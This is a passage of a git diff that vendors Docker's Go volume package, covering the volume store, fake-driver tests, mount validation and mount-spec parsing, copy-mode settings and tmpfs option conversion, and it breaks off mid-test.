+// Refs gets the current list of refs for the given volume +func (s *VolumeStore) Refs(v volume.Volume) []string { + s.locks.Lock(v.Name()) + defer s.locks.Unlock(v.Name()) + + refs := s.getRefs(v.Name()) + refsOut := make([]string, len(refs)) + copy(refsOut, refs) + return refsOut +} + +// FilterByDriver returns the available volumes filtered by driver name +func (s *VolumeStore) FilterByDriver(name string) ([]volume.Volume, error) { + vd, err := volumedrivers.GetDriver(name) + if err != nil { + return nil, &OpErr{Err: err, Name: name, Op: "list"} + } + ls, err := vd.List() + if err != nil { + return nil, &OpErr{Err: err, Name: name, Op: "list"} + } + for i, v := range ls { + options := map[string]string{} + s.globalLock.RLock() + for key, value := range s.options[v.Name()] { + options[key] = value + } + ls[i] = volumeWrapper{v, s.labels[v.Name()], vd.Scope(), options} + s.globalLock.RUnlock() + } + return ls, nil +} + +// FilterByUsed returns the available volumes filtered by if they are in use or not. +// `used=true` returns only volumes that are being used, while `used=false` returns +// only volumes that are not being used. 
+func (s *VolumeStore) FilterByUsed(vols []volume.Volume, used bool) []volume.Volume { + return s.filter(vols, func(v volume.Volume) bool { + s.locks.Lock(v.Name()) + l := len(s.getRefs(v.Name())) + s.locks.Unlock(v.Name()) + if (used && l > 0) || (!used && l == 0) { + return true + } + return false + }) +} + +// filterFunc defines a function to allow filter volumes in the store +type filterFunc func(vol volume.Volume) bool + +// filter returns the available volumes filtered by a filterFunc function +func (s *VolumeStore) filter(vols []volume.Volume, f filterFunc) []volume.Volume { + var ls []volume.Volume + for _, v := range vols { + if f(v) { + ls = append(ls, v) + } + } + return ls +} + +func unwrapVolume(v volume.Volume) volume.Volume { + if vol, ok := v.(volumeWrapper); ok { + return vol.Volume + } + + return v +} + +// Shutdown releases all resources used by the volume store +// It does not make any changes to volumes, drivers, etc. +func (s *VolumeStore) Shutdown() error { + return s.db.Close() +} diff --git a/vendor/github.com/docker/docker/volume/store/store_test.go b/vendor/github.com/docker/docker/volume/store/store_test.go new file mode 100644 index 0000000000..b52f720ca1 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/store/store_test.go @@ -0,0 +1,234 @@ +package store + +import ( + "errors" + "io/ioutil" + "os" + "strings" + "testing" + + "github.com/docker/docker/volume/drivers" + volumetestutils "github.com/docker/docker/volume/testutils" +) + +func TestCreate(t *testing.T) { + volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + defer volumedrivers.Unregister("fake") + dir, err := ioutil.TempDir("", "test-create") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dir) + + s, err := New(dir) + if err != nil { + t.Fatal(err) + } + v, err := s.Create("fake1", "fake", nil, nil) + if err != nil { + t.Fatal(err) + } + if v.Name() != "fake1" { + t.Fatalf("Expected fake1 volume, got %v", v) + } + if l, _, _ := 
s.List(); len(l) != 1 { + t.Fatalf("Expected 1 volume in the store, got %v: %v", len(l), l) + } + + if _, err := s.Create("none", "none", nil, nil); err == nil { + t.Fatalf("Expected unknown driver error, got nil") + } + + _, err = s.Create("fakeerror", "fake", map[string]string{"error": "create error"}, nil) + expected := &OpErr{Op: "create", Name: "fakeerror", Err: errors.New("create error")} + if err != nil && err.Error() != expected.Error() { + t.Fatalf("Expected create fakeError: create error, got %v", err) + } +} + +func TestRemove(t *testing.T) { + volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + volumedrivers.Register(volumetestutils.NewFakeDriver("noop"), "noop") + defer volumedrivers.Unregister("fake") + defer volumedrivers.Unregister("noop") + dir, err := ioutil.TempDir("", "test-remove") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dir) + s, err := New(dir) + if err != nil { + t.Fatal(err) + } + + // doing string compare here since this error comes directly from the driver + expected := "no such volume" + if err := s.Remove(volumetestutils.NoopVolume{}); err == nil || !strings.Contains(err.Error(), expected) { + t.Fatalf("Expected error %q, got %v", expected, err) + } + + v, err := s.CreateWithRef("fake1", "fake", "fake", nil, nil) + if err != nil { + t.Fatal(err) + } + + if err := s.Remove(v); !IsInUse(err) { + t.Fatalf("Expected ErrVolumeInUse error, got %v", err) + } + s.Dereference(v, "fake") + if err := s.Remove(v); err != nil { + t.Fatal(err) + } + if l, _, _ := s.List(); len(l) != 0 { + t.Fatalf("Expected 0 volumes in the store, got %v, %v", len(l), l) + } +} + +func TestList(t *testing.T) { + volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + volumedrivers.Register(volumetestutils.NewFakeDriver("fake2"), "fake2") + defer volumedrivers.Unregister("fake") + defer volumedrivers.Unregister("fake2") + dir, err := ioutil.TempDir("", "test-list") + if err != nil { + t.Fatal(err) + } + defer 
os.RemoveAll(dir) + + s, err := New(dir) + if err != nil { + t.Fatal(err) + } + if _, err := s.Create("test", "fake", nil, nil); err != nil { + t.Fatal(err) + } + if _, err := s.Create("test2", "fake2", nil, nil); err != nil { + t.Fatal(err) + } + + ls, _, err := s.List() + if err != nil { + t.Fatal(err) + } + if len(ls) != 2 { + t.Fatalf("expected 2 volumes, got: %d", len(ls)) + } + if err := s.Shutdown(); err != nil { + t.Fatal(err) + } + + // and again with a new store + s, err = New(dir) + if err != nil { + t.Fatal(err) + } + ls, _, err = s.List() + if err != nil { + t.Fatal(err) + } + if len(ls) != 2 { + t.Fatalf("expected 2 volumes, got: %d", len(ls)) + } +} + +func TestFilterByDriver(t *testing.T) { + volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + volumedrivers.Register(volumetestutils.NewFakeDriver("noop"), "noop") + defer volumedrivers.Unregister("fake") + defer volumedrivers.Unregister("noop") + dir, err := ioutil.TempDir("", "test-filter-driver") + if err != nil { + t.Fatal(err) + } + s, err := New(dir) + if err != nil { + t.Fatal(err) + } + + if _, err := s.Create("fake1", "fake", nil, nil); err != nil { + t.Fatal(err) + } + if _, err := s.Create("fake2", "fake", nil, nil); err != nil { + t.Fatal(err) + } + if _, err := s.Create("fake3", "noop", nil, nil); err != nil { + t.Fatal(err) + } + + if l, _ := s.FilterByDriver("fake"); len(l) != 2 { + t.Fatalf("Expected 2 volumes, got %v, %v", len(l), l) + } + + if l, _ := s.FilterByDriver("noop"); len(l) != 1 { + t.Fatalf("Expected 1 volume, got %v, %v", len(l), l) + } +} + +func TestFilterByUsed(t *testing.T) { + volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + volumedrivers.Register(volumetestutils.NewFakeDriver("noop"), "noop") + dir, err := ioutil.TempDir("", "test-filter-used") + if err != nil { + t.Fatal(err) + } + + s, err := New(dir) + if err != nil { + t.Fatal(err) + } + + if _, err := s.CreateWithRef("fake1", "fake", "volReference", nil, nil); err != 
nil { + t.Fatal(err) + } + if _, err := s.Create("fake2", "fake", nil, nil); err != nil { + t.Fatal(err) + } + + vols, _, err := s.List() + if err != nil { + t.Fatal(err) + } + + dangling := s.FilterByUsed(vols, false) + if len(dangling) != 1 { + t.Fatalf("expected 1 danging volume, got %v", len(dangling)) + } + if dangling[0].Name() != "fake2" { + t.Fatalf("expected danging volume fake2, got %s", dangling[0].Name()) + } + + used := s.FilterByUsed(vols, true) + if len(used) != 1 { + t.Fatalf("expected 1 used volume, got %v", len(used)) + } + if used[0].Name() != "fake1" { + t.Fatalf("expected used volume fake1, got %s", used[0].Name()) + } +} + +func TestDerefMultipleOfSameRef(t *testing.T) { + volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + dir, err := ioutil.TempDir("", "test-same-deref") + if err != nil { + t.Fatal(err) + } + + s, err := New(dir) + if err != nil { + t.Fatal(err) + } + + v, err := s.CreateWithRef("fake1", "fake", "volReference", nil, nil) + if err != nil { + t.Fatal(err) + } + + if _, err := s.GetWithRef("fake1", "fake", "volReference"); err != nil { + t.Fatal(err) + } + + s.Dereference(v, "volReference") + if err := s.Remove(v); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/volume/store/store_unix.go b/vendor/github.com/docker/docker/volume/store/store_unix.go new file mode 100644 index 0000000000..8ebc1f20c7 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/store/store_unix.go @@ -0,0 +1,9 @@ +// +build linux freebsd solaris + +package store + +// normaliseVolumeName is a platform specific function to normalise the name +// of a volume. 
This is a no-op on Unix-like platforms +func normaliseVolumeName(name string) string { + return name +} diff --git a/vendor/github.com/docker/docker/volume/store/store_windows.go b/vendor/github.com/docker/docker/volume/store/store_windows.go new file mode 100644 index 0000000000..8601cdd5cf --- /dev/null +++ b/vendor/github.com/docker/docker/volume/store/store_windows.go @@ -0,0 +1,12 @@ +package store + +import "strings" + +// normaliseVolumeName is a platform specific function to normalise the name +// of a volume. On Windows, as NTFS is case insensitive, under +// c:\ProgramData\Docker\Volumes\, the folders John and john would be synonymous. +// Hence we can't allow the volume "John" and "john" to be created as separate +// volumes. +func normaliseVolumeName(name string) string { + return strings.ToLower(name) +} diff --git a/vendor/github.com/docker/docker/volume/testutils/testutils.go b/vendor/github.com/docker/docker/volume/testutils/testutils.go new file mode 100644 index 0000000000..2dbac02fdb --- /dev/null +++ b/vendor/github.com/docker/docker/volume/testutils/testutils.go @@ -0,0 +1,116 @@ +package testutils + +import ( + "fmt" + + "github.com/docker/docker/volume" +) + +// NoopVolume is a volume that doesn't perform any operation +type NoopVolume struct{} + +// Name is the name of the volume +func (NoopVolume) Name() string { return "noop" } + +// DriverName is the name of the driver +func (NoopVolume) DriverName() string { return "noop" } + +// Path is the filesystem path to the volume +func (NoopVolume) Path() string { return "noop" } + +// Mount mounts the volume in the container +func (NoopVolume) Mount(_ string) (string, error) { return "noop", nil } + +// Unmount unmounts the volume from the container +func (NoopVolume) Unmount(_ string) error { return nil } + +// Status proivdes low-level details about the volume +func (NoopVolume) Status() map[string]interface{} { return nil } + +// FakeVolume is a fake volume with a random name +type FakeVolume 
struct { + name string + driverName string +} + +// NewFakeVolume creates a new fake volume for testing +func NewFakeVolume(name string, driverName string) volume.Volume { + return FakeVolume{name: name, driverName: driverName} +} + +// Name is the name of the volume +func (f FakeVolume) Name() string { return f.name } + +// DriverName is the name of the driver +func (f FakeVolume) DriverName() string { return f.driverName } + +// Path is the filesystem path to the volume +func (FakeVolume) Path() string { return "fake" } + +// Mount mounts the volume in the container +func (FakeVolume) Mount(_ string) (string, error) { return "fake", nil } + +// Unmount unmounts the volume from the container +func (FakeVolume) Unmount(_ string) error { return nil } + +// Status proivdes low-level details about the volume +func (FakeVolume) Status() map[string]interface{} { return nil } + +// FakeDriver is a driver that generates fake volumes +type FakeDriver struct { + name string + vols map[string]volume.Volume +} + +// NewFakeDriver creates a new FakeDriver with the specified name +func NewFakeDriver(name string) volume.Driver { + return &FakeDriver{ + name: name, + vols: make(map[string]volume.Volume), + } +} + +// Name is the name of the driver +func (d *FakeDriver) Name() string { return d.name } + +// Create initializes a fake volume. +// It returns an error if the options include an "error" key with a message +func (d *FakeDriver) Create(name string, opts map[string]string) (volume.Volume, error) { + if opts != nil && opts["error"] != "" { + return nil, fmt.Errorf(opts["error"]) + } + v := NewFakeVolume(name, d.name) + d.vols[name] = v + return v, nil +} + +// Remove deletes a volume. 
+func (d *FakeDriver) Remove(v volume.Volume) error { + if _, exists := d.vols[v.Name()]; !exists { + return fmt.Errorf("no such volume") + } + delete(d.vols, v.Name()) + return nil +} + +// List lists the volumes +func (d *FakeDriver) List() ([]volume.Volume, error) { + var vols []volume.Volume + for _, v := range d.vols { + vols = append(vols, v) + } + return vols, nil +} + +// Get gets the volume +func (d *FakeDriver) Get(name string) (volume.Volume, error) { + if v, exists := d.vols[name]; exists { + return v, nil + } + return nil, fmt.Errorf("no such volume") +} + +// Scope returns the local scope +func (*FakeDriver) Scope() string { + return "local" +} diff --git a/vendor/github.com/docker/docker/volume/validate.go b/vendor/github.com/docker/docker/volume/validate.go new file mode 100644 index 0000000000..27a8c5d5b0 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/validate.go @@ -0,0 +1,125 @@ +package volume + +import ( + "errors" + "fmt" + "os" + "path/filepath" + + "github.com/docker/docker/api/types/mount" +) + +var errBindNotExist = errors.New("bind source path does not exist") + +type validateOpts struct { + skipBindSourceCheck bool + skipAbsolutePathCheck bool +} + +func validateMountConfig(mnt *mount.Mount, options ...func(*validateOpts)) error { + opts := validateOpts{} + for _, o := range options { + o(&opts) + } + + if len(mnt.Target) == 0 { + return &errMountConfig{mnt, errMissingField("Target")} + } + + if err := validateNotRoot(mnt.Target); err != nil { + return &errMountConfig{mnt, err} + } + + if !opts.skipAbsolutePathCheck { + if err := validateAbsolute(mnt.Target); err != nil { + return &errMountConfig{mnt, err} + } + } + + switch mnt.Type { + case mount.TypeBind: + if len(mnt.Source) == 0 { + return &errMountConfig{mnt, errMissingField("Source")} + } + // Don't error out just because the propagation mode is not supported on the platform + if opts := mnt.BindOptions; opts != nil { + if len(opts.Propagation) > 0 && 
len(propagationModes) > 0 { + if _, ok := propagationModes[opts.Propagation]; !ok { + return &errMountConfig{mnt, fmt.Errorf("invalid propagation mode: %s", opts.Propagation)} + } + } + } + if mnt.VolumeOptions != nil { + return &errMountConfig{mnt, errExtraField("VolumeOptions")} + } + + if err := validateAbsolute(mnt.Source); err != nil { + return &errMountConfig{mnt, err} + } + + // Do not allow binding to non-existent path + if !opts.skipBindSourceCheck { + fi, err := os.Stat(mnt.Source) + if err != nil { + if !os.IsNotExist(err) { + return &errMountConfig{mnt, err} + } + return &errMountConfig{mnt, errBindNotExist} + } + if err := validateStat(fi); err != nil { + return &errMountConfig{mnt, err} + } + } + case mount.TypeVolume: + if mnt.BindOptions != nil { + return &errMountConfig{mnt, errExtraField("BindOptions")} + } + + if len(mnt.Source) == 0 && mnt.ReadOnly { + return &errMountConfig{mnt, fmt.Errorf("must not set ReadOnly mode when using anonymous volumes")} + } + + if len(mnt.Source) != 0 { + if valid, err := IsVolumeNameValid(mnt.Source); !valid { + if err == nil { + err = errors.New("invalid volume name") + } + return &errMountConfig{mnt, err} + } + } + case mount.TypeTmpfs: + if len(mnt.Source) != 0 { + return &errMountConfig{mnt, errExtraField("Source")} + } + if _, err := ConvertTmpfsOptions(mnt.TmpfsOptions, mnt.ReadOnly); err != nil { + return &errMountConfig{mnt, err} + } + default: + return &errMountConfig{mnt, errors.New("mount type unknown")} + } + return nil +} + +type errMountConfig struct { + mount *mount.Mount + err error +} + +func (e *errMountConfig) Error() string { + return fmt.Sprintf("invalid mount config for type %q: %v", e.mount.Type, e.err.Error()) +} + +func errExtraField(name string) error { + return fmt.Errorf("field %s must not be specified", name) +} +func errMissingField(name string) error { + return fmt.Errorf("field %s must not be empty", name) +} + +func validateAbsolute(p string) error { + p = convertSlash(p) + if 
filepath.IsAbs(p) { + return nil + } + return fmt.Errorf("invalid mount path: '%s' mount path must be absolute", p) +} diff --git a/vendor/github.com/docker/docker/volume/validate_test.go b/vendor/github.com/docker/docker/volume/validate_test.go new file mode 100644 index 0000000000..8732500fc0 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/validate_test.go @@ -0,0 +1,43 @@ +package volume + +import ( + "errors" + "io/ioutil" + "os" + "strings" + "testing" + + "github.com/docker/docker/api/types/mount" +) + +func TestValidateMount(t *testing.T) { + testDir, err := ioutil.TempDir("", "test-validate-mount") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(testDir) + + cases := []struct { + input mount.Mount + expected error + }{ + {mount.Mount{Type: mount.TypeVolume}, errMissingField("Target")}, + {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath, Source: "hello"}, nil}, + {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath}, nil}, + {mount.Mount{Type: mount.TypeBind}, errMissingField("Target")}, + {mount.Mount{Type: mount.TypeBind, Target: testDestinationPath}, errMissingField("Source")}, + {mount.Mount{Type: mount.TypeBind, Target: testDestinationPath, Source: testSourcePath, VolumeOptions: &mount.VolumeOptions{}}, errExtraField("VolumeOptions")}, + {mount.Mount{Type: mount.TypeBind, Source: testSourcePath, Target: testDestinationPath}, errBindNotExist}, + {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath}, nil}, + {mount.Mount{Type: "invalid", Target: testDestinationPath}, errors.New("mount type unknown")}, + } + for i, x := range cases { + err := validateMountConfig(&x.input) + if err == nil && x.expected == nil { + continue + } + if (err == nil && x.expected != nil) || (x.expected == nil && err != nil) || !strings.Contains(err.Error(), x.expected.Error()) { + t.Fatalf("expected %q, got %q, case: %d", x.expected, err, i) + } + } +} diff --git 
a/vendor/github.com/docker/docker/volume/validate_test_unix.go b/vendor/github.com/docker/docker/volume/validate_test_unix.go new file mode 100644 index 0000000000..dd1de2f643 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/validate_test_unix.go @@ -0,0 +1,8 @@ +// +build !windows + +package volume + +var ( + testDestinationPath = "/foo" + testSourcePath = "/foo" +) diff --git a/vendor/github.com/docker/docker/volume/validate_test_windows.go b/vendor/github.com/docker/docker/volume/validate_test_windows.go new file mode 100644 index 0000000000..d5f86ac850 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/validate_test_windows.go @@ -0,0 +1,6 @@ +package volume + +var ( + testDestinationPath = `c:\foo` + testSourcePath = `c:\foo` +) diff --git a/vendor/github.com/docker/docker/volume/volume.go b/vendor/github.com/docker/docker/volume/volume.go new file mode 100644 index 0000000000..f3227fe485 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume.go @@ -0,0 +1,323 @@ +package volume + +import ( + "fmt" + "os" + "path/filepath" + "strings" + "syscall" + + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/stringid" + "github.com/opencontainers/runc/libcontainer/label" + "github.com/pkg/errors" +) + +// DefaultDriverName is the driver name used for the driver +// implemented in the local package. +const DefaultDriverName = "local" + +// Scopes define if a volume has is cluster-wide (global) or local only. +// Scopes are returned by the volume driver when it is queried for capabilities and then set on a volume +const ( + LocalScope = "local" + GlobalScope = "global" +) + +// Driver is for creating and removing volumes. +type Driver interface { + // Name returns the name of the volume driver. + Name() string + // Create makes a new volume with the given id. + Create(name string, opts map[string]string) (Volume, error) + // Remove deletes the volume. 
+ Remove(vol Volume) (err error) + // List lists all the volumes the driver has + List() ([]Volume, error) + // Get retrieves the volume with the requested name + Get(name string) (Volume, error) + // Scope returns the scope of the driver (e.g. `global` or `local`). + // Scope determines how the driver is handled at a cluster level + Scope() string +} + +// Capability defines a set of capabilities that a driver is able to handle. +type Capability struct { + // Scope is the scope of the driver, `global` or `local` + // A `global` scope indicates that the driver manages volumes across the cluster + // A `local` scope indicates that the driver only manages volumes resources local to the host + // Scope is declared by the driver + Scope string +} + +// Volume is a place to store data. It is backed by a specific driver, and can be mounted. +type Volume interface { + // Name returns the name of the volume + Name() string + // DriverName returns the name of the driver which owns this volume. + DriverName() string + // Path returns the absolute path to the volume. + Path() string + // Mount mounts the volume and returns the absolute path to + // where it can be consumed. + Mount(id string) (string, error) + // Unmount unmounts the volume when it is no longer in use. + Unmount(id string) error + // Status returns low-level status information about a volume + Status() map[string]interface{} +} + +// DetailedVolume wraps a Volume with user-defined labels, options, and cluster scope (e.g., `local` or `global`) +type DetailedVolume interface { + Labels() map[string]string + Options() map[string]string + Scope() string + Volume +} + +// MountPoint is the intersection point between a volume and a container. It +// specifies which volume is to be used and where inside a container it should +// be mounted. +type MountPoint struct { + // Source is the source path of the mount. + // E.g. `mount --bind /foo /bar`, `/foo` is the `Source`. 
+ Source string + // Destination is the path relative to the container root (`/`) to the mount point + // It is where the `Source` is mounted to + Destination string + // RW is set to true when the mountpoint should be mounted as read-write + RW bool + // Name is the name reference to the underlying data defined by `Source` + // e.g., the volume name + Name string + // Driver is the volume driver used to create the volume (if it is a volume) + Driver string + // Type of mount to use, see `Type` definitions in github.com/docker/docker/api/types/mount + Type mounttypes.Type `json:",omitempty"` + // Volume is the volume providing data to this mountpoint. + // This is nil unless `Type` is set to `TypeVolume` + Volume Volume `json:"-"` + + // Mode is the comma separated list of options supplied by the user when creating + // the bind/volume mount. + // Note Mode is not used on Windows + Mode string `json:"Relabel,omitempty"` // Originally field was `Relabel`" + + // Propagation describes how the mounts are propagated from the host into the + // mount point, and vice-versa. + // See https://www.kernel.org/doc/Documentation/filesystems/sharedsubtree.txt + // Note Propagation is not used on Windows + Propagation mounttypes.Propagation `json:",omitempty"` // Mount propagation string + + // Specifies if data should be copied from the container before the first mount + // Use a pointer here so we can tell if the user set this value explicitly + // This allows us to error out when the user explicitly enabled copy but we can't copy due to the volume being populated + CopyData bool `json:"-"` + // ID is the opaque ID used to pass to the volume driver. + // This should be set by calls to `Mount` and unset by calls to `Unmount` + ID string `json:",omitempty"` + + // Sepc is a copy of the API request that created this mount. 
+ Spec mounttypes.Mount +} + +// Setup sets up a mount point by either mounting the volume if it is +// configured, or creating the source directory if supplied. +func (m *MountPoint) Setup(mountLabel string, rootUID, rootGID int) (string, error) { + if m.Volume != nil { + id := m.ID + if id == "" { + id = stringid.GenerateNonCryptoID() + } + path, err := m.Volume.Mount(id) + if err != nil { + return "", errors.Wrapf(err, "error while mounting volume '%s'", m.Source) + } + m.ID = id + return path, nil + } + if len(m.Source) == 0 { + return "", fmt.Errorf("Unable to setup mount point, neither source nor volume defined") + } + // system.MkdirAll() produces an error if m.Source exists and is a file (not a directory), + if m.Type == mounttypes.TypeBind { + // idtools.MkdirAllNewAs() produces an error if m.Source exists and is a file (not a directory) + // also, makes sure that if the directory is created, the correct remapped rootUID/rootGID will own it + if err := idtools.MkdirAllNewAs(m.Source, 0755, rootUID, rootGID); err != nil { + if perr, ok := err.(*os.PathError); ok { + if perr.Err != syscall.ENOTDIR { + return "", errors.Wrapf(err, "error while creating mount source path '%s'", m.Source) + } + } + } + } + if label.RelabelNeeded(m.Mode) { + if err := label.Relabel(m.Source, mountLabel, label.IsShared(m.Mode)); err != nil { + return "", errors.Wrapf(err, "error setting label on mount source '%s'", m.Source) + } + } + return m.Source, nil +} + +// Path returns the path of a volume in a mount point. +func (m *MountPoint) Path() string { + if m.Volume != nil { + return m.Volume.Path() + } + return m.Source +} + +// ParseVolumesFrom ensures that the supplied volumes-from is valid. 
+func ParseVolumesFrom(spec string) (string, string, error) { + if len(spec) == 0 { + return "", "", fmt.Errorf("volumes-from specification cannot be an empty string") + } + + specParts := strings.SplitN(spec, ":", 2) + id := specParts[0] + mode := "rw" + + if len(specParts) == 2 { + mode = specParts[1] + if !ValidMountMode(mode) { + return "", "", errInvalidMode(mode) + } + // For now don't allow propagation properties while importing + // volumes from data container. These volumes will inherit + // the same propagation property as of the original volume + // in data container. This probably can be relaxed in future. + if HasPropagation(mode) { + return "", "", errInvalidMode(mode) + } + // Do not allow copy modes on volumes-from + if _, isSet := getCopyMode(mode); isSet { + return "", "", errInvalidMode(mode) + } + } + return id, mode, nil +} + +// ParseMountRaw parses a raw volume spec (e.g. `-v /foo:/bar:shared`) into a +// structured spec. Once the raw spec is parsed it relies on `ParseMountSpec` to +// validate the spec and create a MountPoint +func ParseMountRaw(raw, volumeDriver string) (*MountPoint, error) { + arr, err := splitRawSpec(convertSlash(raw)) + if err != nil { + return nil, err + } + + var spec mounttypes.Mount + var mode string + switch len(arr) { + case 1: + // Just a destination path in the container + spec.Target = arr[0] + case 2: + if ValidMountMode(arr[1]) { + // Destination + Mode is not a valid volume - volumes + // cannot include a mode. 
eg /foo:rw + return nil, errInvalidSpec(raw) + } + // Host Source Path or Name + Destination + spec.Source = arr[0] + spec.Target = arr[1] + case 3: + // HostSourcePath+DestinationPath+Mode + spec.Source = arr[0] + spec.Target = arr[1] + mode = arr[2] + default: + return nil, errInvalidSpec(raw) + } + + if !ValidMountMode(mode) { + return nil, errInvalidMode(mode) + } + + if filepath.IsAbs(spec.Source) { + spec.Type = mounttypes.TypeBind + } else { + spec.Type = mounttypes.TypeVolume + } + + spec.ReadOnly = !ReadWrite(mode) + + // cannot assume that if a volume driver is passed in that we should set it + if volumeDriver != "" && spec.Type == mounttypes.TypeVolume { + spec.VolumeOptions = &mounttypes.VolumeOptions{ + DriverConfig: &mounttypes.Driver{Name: volumeDriver}, + } + } + + if copyData, isSet := getCopyMode(mode); isSet { + if spec.VolumeOptions == nil { + spec.VolumeOptions = &mounttypes.VolumeOptions{} + } + spec.VolumeOptions.NoCopy = !copyData + } + if HasPropagation(mode) { + spec.BindOptions = &mounttypes.BindOptions{ + Propagation: GetPropagation(mode), + } + } + + mp, err := ParseMountSpec(spec, platformRawValidationOpts...) + if mp != nil { + mp.Mode = mode + } + if err != nil { + err = fmt.Errorf("%v: %v", errInvalidSpec(raw), err) + } + return mp, err +} + +// ParseMountSpec reads a mount config, validates it, and configures a mountpoint from it. 
+func ParseMountSpec(cfg mounttypes.Mount, options ...func(*validateOpts)) (*MountPoint, error) { + if err := validateMountConfig(&cfg, options...); err != nil { + return nil, err + } + mp := &MountPoint{ + RW: !cfg.ReadOnly, + Destination: clean(convertSlash(cfg.Target)), + Type: cfg.Type, + Spec: cfg, + } + + switch cfg.Type { + case mounttypes.TypeVolume: + if cfg.Source == "" { + mp.Name = stringid.GenerateNonCryptoID() + } else { + mp.Name = cfg.Source + } + mp.CopyData = DefaultCopyMode + + if cfg.VolumeOptions != nil { + if cfg.VolumeOptions.DriverConfig != nil { + mp.Driver = cfg.VolumeOptions.DriverConfig.Name + } + if cfg.VolumeOptions.NoCopy { + mp.CopyData = false + } + } + case mounttypes.TypeBind: + mp.Source = clean(convertSlash(cfg.Source)) + if cfg.BindOptions != nil { + if len(cfg.BindOptions.Propagation) > 0 { + mp.Propagation = cfg.BindOptions.Propagation + } + } + case mounttypes.TypeTmpfs: + // NOP + } + return mp, nil +} + +func errInvalidMode(mode string) error { + return fmt.Errorf("invalid mode: %v", mode) +} + +func errInvalidSpec(spec string) error { + return fmt.Errorf("invalid volume specification: '%s'", spec) +} diff --git a/vendor/github.com/docker/docker/volume/volume_copy.go b/vendor/github.com/docker/docker/volume/volume_copy.go new file mode 100644 index 0000000000..77f06a0d1f --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_copy.go @@ -0,0 +1,23 @@ +package volume + +import "strings" + +// {=isEnabled} +var copyModes = map[string]bool{ + "nocopy": false, +} + +func copyModeExists(mode string) bool { + _, exists := copyModes[mode] + return exists +} + +// GetCopyMode gets the copy mode from the mode string for mounts +func getCopyMode(mode string) (bool, bool) { + for _, o := range strings.Split(mode, ",") { + if isEnabled, exists := copyModes[o]; exists { + return isEnabled, true + } + } + return DefaultCopyMode, false +} diff --git a/vendor/github.com/docker/docker/volume/volume_copy_unix.go 
b/vendor/github.com/docker/docker/volume/volume_copy_unix.go new file mode 100644 index 0000000000..ad66e17637 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_copy_unix.go @@ -0,0 +1,8 @@ +// +build !windows + +package volume + +const ( + // DefaultCopyMode is the copy mode used by default for normal/named volumes + DefaultCopyMode = true +) diff --git a/vendor/github.com/docker/docker/volume/volume_copy_windows.go b/vendor/github.com/docker/docker/volume/volume_copy_windows.go new file mode 100644 index 0000000000..798638c878 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_copy_windows.go @@ -0,0 +1,6 @@ +package volume + +const ( + // DefaultCopyMode is the copy mode used by default for normal/named volumes + DefaultCopyMode = false +) diff --git a/vendor/github.com/docker/docker/volume/volume_linux.go b/vendor/github.com/docker/docker/volume/volume_linux.go new file mode 100644 index 0000000000..d4b4d800b2 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_linux.go @@ -0,0 +1,56 @@ +// +build linux + +package volume + +import ( + "fmt" + "strings" + + mounttypes "github.com/docker/docker/api/types/mount" +) + +// ConvertTmpfsOptions converts *mounttypes.TmpfsOptions to the raw option string +// for mount(2). +func ConvertTmpfsOptions(opt *mounttypes.TmpfsOptions, readOnly bool) (string, error) { + var rawOpts []string + if readOnly { + rawOpts = append(rawOpts, "ro") + } + + if opt != nil && opt.Mode != 0 { + rawOpts = append(rawOpts, fmt.Sprintf("mode=%o", opt.Mode)) + } + + if opt != nil && opt.SizeBytes != 0 { + // calculate suffix here, making this linux specific, but that is + // okay, since API is that way anyways. + + // we do this by finding the suffix that divides evenly into the + // value, returing the value itself, with no suffix, if it fails. + // + // For the most part, we don't enforce any semantic to this values. 
+ // The operating system will usually align this and enforce minimum + // and maximums. + var ( + size = opt.SizeBytes + suffix string + ) + for _, r := range []struct { + suffix string + divisor int64 + }{ + {"g", 1 << 30}, + {"m", 1 << 20}, + {"k", 1 << 10}, + } { + if size%r.divisor == 0 { + size = size / r.divisor + suffix = r.suffix + break + } + } + + rawOpts = append(rawOpts, fmt.Sprintf("size=%d%s", size, suffix)) + } + return strings.Join(rawOpts, ","), nil +} diff --git a/vendor/github.com/docker/docker/volume/volume_linux_test.go b/vendor/github.com/docker/docker/volume/volume_linux_test.go new file mode 100644 index 0000000000..40ce5525a3 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_linux_test.go @@ -0,0 +1,51 @@ +// +build linux + +package volume + +import ( + "strings" + "testing" + + mounttypes "github.com/docker/docker/api/types/mount" +) + +func TestConvertTmpfsOptions(t *testing.T) { + type testCase struct { + opt mounttypes.TmpfsOptions + readOnly bool + expectedSubstrings []string + unexpectedSubstrings []string + } + cases := []testCase{ + { + opt: mounttypes.TmpfsOptions{SizeBytes: 1024 * 1024, Mode: 0700}, + readOnly: false, + expectedSubstrings: []string{"size=1m", "mode=700"}, + unexpectedSubstrings: []string{"ro"}, + }, + { + opt: mounttypes.TmpfsOptions{}, + readOnly: true, + expectedSubstrings: []string{"ro"}, + unexpectedSubstrings: []string{}, + }, + } + for _, c := range cases { + data, err := ConvertTmpfsOptions(&c.opt, c.readOnly) + if err != nil { + t.Fatalf("could not convert %+v (readOnly: %v) to string: %v", + c.opt, 